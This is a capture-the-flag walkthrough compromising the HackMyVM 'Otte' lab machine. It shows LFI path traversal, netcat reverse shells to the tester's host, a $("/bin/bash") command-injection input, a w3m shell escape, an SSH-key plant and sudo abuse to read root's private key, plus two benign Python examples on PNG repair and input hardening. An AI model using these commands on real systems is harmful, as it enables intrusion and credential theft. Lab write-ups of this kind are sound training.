HackMyVm Otte Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Otte

Start with a full TCP port scan:

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for 192.168.56.100 (192.168.56.100)
 Host is up (0.00099s latency).
 Not shown: 65532 closed ports
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     ProFTPD
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_-rw-r--r--   1 ftp      ftp            89 May 15 12:25 note.txt
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 e8:38:58:1b:75:c5:53:47:32:10:d4:12:79:69:c8:ad (RSA)
 |   256 35:92:34:4e:cd:65:c6:08:20:76:35:ba:d9:09:64:65 (ECDSA)
 |_  256 a2:87:9f:60:a4:0d:c5:43:6a:4f:02:79:56:ff:6e:d9 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38
 | http-auth:
 | HTTP/1.1 401 Unauthorized\x0D
 |_  Basic realm=Siemens - Root authentification
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: 401 Unauthorized
 Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Log in to FTP anonymously and fetch note.txt:

 cat note.txt
 Hi thomas ! I put on you personal folder the php code you asked me !

 See you later +++

Port 80 requires HTTP Basic authentication, and the realm name mentions Siemens.

[image-20210523214949625.png]

Following the hint, search for default credentials of Siemens routers. (This step was hard for me because I have never used a Siemens router.)

https://www.192-168-1-1-ip.co/router/siemens/siemens/17622/

After some failed attempts, we get the correct credentials:

root zP2wxY4uE

With these credentials we can brute-force directories and files (gobuster passes Basic auth with -U/-P):

 gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log -U root -P zP2wxY4uE

 /index.php            (Status: 200) [Size: 28]
 /image                (Status: 200) [Size: 47076]
 /config.php           (Status: 200) [Size: 0]
 /thinkgeek.php        (Status: 200) [Size: 28]

Fuzz thinkgeek.php for a parameter name. --hh 28 hides responses of the 28-byte baseline size, so only a parameter that changes the output is shown:

 wfuzz -u 'http://192.168.56.100/thinkgeek.php?FUZZ=id' -w /usr/share/seclists/Discovery/Web-Content/big.txt --basic root:zP2wxY4uE --hh 28

 000007535:   200        0 L      0 W        0 Ch        "file"  

The parameter name suggests a file include, so try path traversal (LFI):

 curl -u  root:zP2wxY4uE 'http://192.168.56.100/thinkgeek.php?file=../../../../etc/passwd'

 root:x:0:0:root:/root:/bin/bash
 ...
 thomas:x:1000:1000:thomas,,,:/home/thomas:/bin/bash
 ...
 laetitia:x:1001:1001:,,,:/home/laetitia:/bin/bash
 cedric:x:1002:1002:,,,:/home/cedric:/bin/bash

Following the hint in note.txt, fuzz for PHP files in /home/thomas. --hh 0 hides the empty responses that non-existent files produce:

 wfuzz -u 'http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/FUZZ.php' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt  --basic root:zP2wxY4uE --hh 0

 =====================================================================
 ID           Response   Lines    Word       Chars       Payload      
 =====================================================================

 000016344:   200        2 L      3 W        20 Ch       "shell"  

shell.php is 93 bytes on disk but the include returns 20 bytes, so the PHP is being executed, not just read. Fuzz for the parameter it expects (--hh 20 hides the baseline):

 wfuzz -u 'http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/shell.php&FUZZ=id' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt  --basic root:zP2wxY4uE --hh 20

 =====================================================================
 ID           Response   Lines    Word       Chars       Payload  
 =====================================================================

 000004959:   200        3 L      6 W        74 Ch       "command"

Call shell.php through the include with a reverse-shell command:

http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/shell.php&command=nc%20192.168.56.150%201234%20-e%20/bin/bash

In another terminal, listen on port 1234 and catch the shell:

 ~ nc -nlvp 1234    
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:59386.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Upgrade to an interactive shell:

 python3 -c 'import pty;pty.spawn("/bin/bash")'
 www-data@otte:/var/www/html$

In /home/thomas we find nightmare.txt and important_file:

 www-data@otte:/home/thomas$ ls -la
 ls -la
 total 100
 drwxr-xr-x 4 thomas thomas  4096 May 20 09:46 .
 drwxr-xr-x 5 root   root    4096 May 16 12:34 ..
 -rw------- 1 thomas thomas    50 May 20 09:46 .Xauthority
 lrwxrwxrwx 1 thomas thomas     9 May 16 13:25 .bash_history -> /dev/null
 -rw-r--r-- 1 thomas thomas   220 May 15 12:12 .bash_logout
 -rw-r--r-- 1 thomas thomas  3526 May 17 14:42 .bashrc
 drwxr-xr-x 3 thomas thomas  4096 May 15 14:00 .local
 -rw-r--r-- 1 thomas thomas   807 May 15 12:12 .profile
 drwx------ 2 thomas thomas  4096 May 17 09:35 .ssh
 -rw-r--r-- 1 thomas thomas 61258 May 15 14:44 important_file
 -rw-r--r-- 1 thomas thomas   122 May 15 14:56 nightmare.txt
 -rwxr-xr-x 1 thomas thomas    93 May 17 09:15 shell.php
 www-data@otte:/home/thomas$ cat nightmare.txt
 cat nightmare.txt
 who is the son of a bitch who replaced the signature on my file with fucking XXX?! I need to find the original signature!
 www-data@otte:/home/thomas$

Download important_file to the local machine and look at it. It is not a binary but an xxd-style hex dump stored as text, and the first 8 bytes (16 hex digits) have been replaced with X's:

 less important_file
 00000000: XXXXXXXXXXXXXXXX 0000 000d 4948 4452  .XXX........IHDR
 00000010: 0000 012c 0000 012c 0806 0000 0079 7d8e  ...,...,.....y}.
 00000020: 7500 0000 1b74 4558 7443 7265 6174 696f  u....tEXtCreatio
 00000030: 6e20 5469 6d65 0031 3632 3130 3037 3337  n Time.162100737
 00000040: 3935 3239 15fc b9e2 0000 37e9 4944 4154  9529......7.IDAT
 00000050: 78da ed9d 8bab 7ecf 55de f38f 168a 2085  x.....~.U..... .
 00000060: 2214 410a 2208 2294 8214 4428 8582 286a  ".A."."...D(..(j
 00000070: bd50 898a d6b6 62b0 28a2 a849 9a18 a3b9  .P....b.(..I....

...

IHDR is the first chunk of a PNG file, so the missing bytes are the 8-byte PNG signature 89 50 4e 47 0d 0a 1a 0a (the tEXt "Creation Time" and IDAT chunks that follow confirm the format). Replace the X's with the signature:

 head important_file  
 00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452  .XXX........IHDR
 00000010: 0000 012c 0000 012c 0806 0000 0079 7d8e  ...,...,.....y}.
 00000020: 7500 0000 1b74 4558 7443 7265 6174 696f  u....tEXtCreatio
 00000030: 6e20 5469 6d65 0031 3632 3130 3037 3337  n Time.162100737
 00000040: 3935 3239 15fc b9e2 0000 37e9 4944 4154  9529......7.IDAT
 00000050: 78da ed9d 8bab 7ecf 55de f38f 168a 2085  x.....~.U..... .
 00000060: 2214 410a 2208 2294 8214 4428 8582 286a  ".A."."...D(..(j
 00000070: bd50 898a d6b6 62b0 28a2 a849 9a18 a3b9  .P....b.(..I....
 00000080: 7889 a931 3626 8d9a 8ba6 8947 3e5f ddb8  x..16&.....G>_..
 00000090: ddee 99f5 ccac 35b3 67ef 773d 3090 7c7f  ......5.g.w=0.|.

Convert the hex dump back to bytes (CyberChef's "From Hexdump" followed by "Render Image") and we get a QR code.
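The repair above can also be done and, more importantly, verified without CyberChef: every PNG chunk carries a CRC-32 over its type and data, so once the signature is restored the IHDR, tEXt and IDAT CRCs tell you whether the rest of the dump is intact. The script below is an added example, not part of the original walkthrough. Because important_file itself is not reproduced here, it constructs a small valid PNG, dumps it in xxd format and X's out the signature the way the challenge did (a constructed sample), then parses the dump, restores the signature and checks each chunk's CRC. build_png, to_xxd and make_corrupted_dump exist only to construct that sample.

```python
import re
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"   # 89 50 4e 47 0d 0a 1a 0a


def build_png(width, height, rgba=(255, 0, 0, 255)):
    """Build a minimal solid-colour 8-bit RGBA PNG (only used to construct the sample)."""
    def chunk(ctype, body):
        crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
        return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 6, 0, 0, 0)
    row = b"\x00" + bytes(rgba) * width          # filter byte 0 followed by the pixels
    idat = zlib.compress(row * height)
    return PNG_SIGNATURE + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")


def to_xxd(data):
    """Render bytes the way `xxd` does: offset, 8 groups of 2 bytes, ASCII column."""
    lines = []
    for off in range(0, len(data), 16):
        block = data[off:off + 16]
        groups = " ".join(block[i:i + 2].hex() for i in range(0, len(block), 2))
        printable = "".join(chr(b) if 32 <= b < 127 else "." for b in block)
        lines.append(f"{off:08x}: {groups:<39}  {printable}")
    return "\n".join(lines) + "\n"


def make_corrupted_dump(width=2, height=2):
    """Constructed stand-in for important_file: an xxd dump whose first 16 hex
    digits (the 8-byte signature) have been overwritten with X's."""
    dump = to_xxd(build_png(width, height))
    first, rest = dump.split("\n", 1)
    # "00000000: " is 10 chars, "8950 4e47 0d0a 1a0a" is the next 19
    return first[:10] + "X" * 16 + first[29:] + "\n" + rest


def parse_xxd_dump(text):
    """Turn an xxd-style dump back into bytes. A non-hex pair (the X placeholders)
    becomes 0x00 so every later offset stays aligned."""
    data = bytearray()
    for line in text.splitlines():
        if ":" not in line:
            continue
        hex_col = line.split(":", 1)[1].lstrip().split("  ", 1)[0]
        for group in hex_col.split():
            for i in range(0, len(group), 2):
                pair = group[i:i + 2]
                data.append(int(pair, 16) if re.fullmatch(r"[0-9a-fA-F]{2}", pair) else 0)
    return bytes(data)


def repair_png_signature(data):
    """Restore the signature, but only if the first chunk header says this is a PNG."""
    if data[12:16] != b"IHDR":
        raise ValueError("no IHDR at offset 12; this does not look like a PNG")
    return PNG_SIGNATURE + data[8:]


def png_chunks(data):
    """List (type, length, crc_ok) for every chunk; stops at IEND or at truncation."""
    chunks, pos = [], len(PNG_SIGNATURE)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length
        if end > len(data):
            chunks.append((ctype.decode("latin-1"), length, False))   # truncated chunk
            break
        body = data[pos + 8:pos + 8 + length]
        stored = struct.unpack(">I", data[pos + 8 + length:end])[0]
        crc_ok = (zlib.crc32(ctype + body) & 0xFFFFFFFF) == stored
        chunks.append((ctype.decode("latin-1"), length, crc_ok))
        pos = end
        if ctype == b"IEND":
            break
    return chunks


def ihdr_info(data):
    """(width, height, bit depth, colour type) from IHDR, which must be the first chunk."""
    return struct.unpack(">IIBB", data[16:26])


def repair_dump(text):
    """Dump text -> bytes -> signature restored -> (bytes, per-chunk CRC report)."""
    fixed = repair_png_signature(parse_xxd_dump(text))
    return fixed, png_chunks(fixed)


if __name__ == "__main__":
    fixed, report = repair_dump(make_corrupted_dump(300, 300))
    print("IHDR:", ihdr_info(fixed))
    for ctype, length, ok in report:
        print(f"{ctype} {length:>6} bytes  CRC {'ok' if ok else 'BAD'}")
    with open("repaired.png", "wb") as fh:
        fh.write(fixed)
```

On the real file, feed the text of important_file to repair_dump instead of the constructed sample; if any chunk reports a bad CRC, more than the signature was tampered with and the image viewer's complaints are not just about the header.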

[image-20210523212230214.png]

Decode the QR code to get a link.

[image-20210523212429143.png]

Visiting https://eqrcode.co/a/SVxQdM gives the password of thomas.

Log in over SSH as thomas and check sudo:

 thomas@otte:/home/laetitia$ sudo -l
 Matching Defaults entries for thomas on otte:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User thomas may run the following commands on otte:
     (laetitia) NOPASSWD: /usr/bin/python3 /home/laetitia/simpler.py *

simpler.py prompts for an IP address and hands it to a shell command without validation, so shell command substitution in the input runs as laetitia:

 thomas@otte:/home/laetitia$ sudo -u laetitia /usr/bin/python3 /home/laetitia/simpler.py -p
 ***********************************************
      _                 _
  ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _
 / __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
 \__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
 |___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                 |_|               |_|    |___/
                                 @ironhackers.es

 ***********************************************

 Enter an IP: $("/bin/bash")
 laetitia@otte:~$
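The page does not reproduce simpler.py, but the fact that $("/bin/bash") is executed tells us the input reaches a shell unquoted. The following is an added example and not the machine's code: a constructed stand-in for that pattern (vulnerable_ping_command, assumed to build a ping command line) next to two hardened versions, one that merely quotes the value for the shell with shlex.quote and one that validates it as an IP address and never starts a shell at all.

```python
import ipaddress
import shlex
import subprocess


def vulnerable_ping_command(ip):
    """Constructed stand-in for what simpler.py's behaviour implies: the 'IP' is
    pasted into a command line that /bin/sh parses, so $(...), backticks, ; and |
    are interpreted before ping ever runs (as if passed to os.system)."""
    return f"ping -c 1 {ip}"


def quoted_ping_command(ip):
    """Still a shell command, but shlex.quote wraps the value in single quotes so
    the shell treats it as one literal word; ping then rejects it as a hostname."""
    return "ping -c 1 " + shlex.quote(ip)


def is_valid_ip(value):
    """True only for a syntactically valid IPv4 or IPv6 address."""
    try:
        ipaddress.ip_address(value.strip())
        return True
    except ValueError:
        return False


def safe_ping_args(ip):
    """Preferred fix: allow-list the input and pass an argv list to the OS with
    no shell in between, so there is nothing left to inject into."""
    if not is_valid_ip(ip):
        raise ValueError(f"not an IP address: {ip!r}")
    return ["ping", "-c", "1", str(ipaddress.ip_address(ip.strip()))]


def run_ping(ip):
    """Run the hardened version; shell=False is subprocess.run's default."""
    return subprocess.run(safe_ping_args(ip), capture_output=True, text=True)


if __name__ == "__main__":
    payload = '$("/bin/bash")'
    print("vulnerable :", vulnerable_ping_command(payload))
    print("quoted     :", quoted_ping_command(payload))
    for value in ("192.168.56.150", payload):
        print(f"{value!r:>18} valid ip: {is_valid_ip(value)}")
```

Quoting alone closes the substitution but keeps the shell in the loop; the allow-list plus argv-list version removes the shell entirely, which is the fix to reach for in a sudo-exposed script.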

This shell is not interactive (it is running inside simpler.py's prompt), so from it run 'nc 192.168.56.150 1234 -e /bin/bash' to get a proper reverse shell as laetitia.

[image-20210523220810457.png]

Check sudo again, now as laetitia:

 laetitia@otte:~$ sudo -l
 sudo -l
 Matching Defaults entries for laetitia on otte:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User laetitia may run the following commands on otte:
     (cedric) NOPASSWD: /usr/bin/w3m

w3m has a shell escape (! runs a command), so serve any page from the local machine with PHP's built-in server (php -S 0.0.0.0:80), open it with w3m as cedric, and spawn a shell:

 sudo -u cedric /usr/bin/w3m http://192.168.56.150

Inside w3m run !/bin/bash; we are now cedric.

[image-20210523221401950.png]

In /home/cedric/.ssh, install our SSH public key as authorized_keys (served from the same local web server):

 wget http://192.168.56.150/id_rsa.pub -O authorized_keys

Then we can log in over SSH as cedric and check sudo again:

 cedric@otte:~$ sudo -l
 Matching Defaults entries for cedric on otte:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User cedric may run the following commands on otte:
     (ALL : ALL) NOPASSWD: /usr/bin/mmwatch

Reading the code of mmwatch shows it executes the command string it is given, and cedric may run it as root without a password, so it can read root's SSH private key:

 sudo /usr/bin/mmwatch "cat /root/.ssh/id_rsa"

Copy the key to the local machine and log in over SSH as root:

 root@otte:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 otte
 root@otte:~# ls -la /root
 total 40
 drwx------  4 root root 4096 May 20 10:30 .
 drwxr-xr-x 18 root root 4096 May 15 12:07 ..
 lrwxrwxrwx  1 root root    9 May 16 13:25 .bash_history -> /dev/null
 -rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
 drwxr-xr-x  3 root root 4096 May 15 12:13 .local
 -rw-------  1 root root 1500 May 15 13:23 .mysql_history
 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
 -rwx------  1 root root   33 May 16 14:02 root.txt
 drwx------  2 root root 4096 May 16 13:24 .ssh
 -rw-r--r--  1 root root  173 May 15 12:19 .wget-hsts
 -rw-------  1 root root  100 May 20 10:30 .Xauthority
